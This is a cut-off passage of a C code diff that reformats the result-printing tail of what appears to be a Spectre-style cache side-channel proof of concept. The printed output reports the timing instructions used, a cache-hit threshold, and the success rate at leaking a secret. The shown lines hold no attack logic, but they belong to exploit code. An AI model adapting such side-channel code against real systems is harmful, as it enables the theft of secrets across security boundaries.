%-27s\t",argv[0] + 2); #ifndef NORDTSCP - fprintf(stderr, "RDTSCP "); - #else - fprintf(stderr, "RDTSC "); - #endif - #ifndef NOMFENCE - fprintf(stderr, "MFENCE "); - #endif - #ifndef NOCLFLUSH - fprintf(stderr, "CLFLUSH "); - #endif - fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", - cache_hit_threshold, - 100 * successes / (float)strlen(secret)); + fprintf(stderr, "RDTSCP "); + #else + fprintf(stderr, "RDTSC "); + #endif + #ifndef NOMFENCE + fprintf(stderr, "MFENCE "); + #endif + #ifndef NOCLFLUSH + fprintf(stderr, "CLFLUSH "); + #endif + fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret)); free(target); return 0; }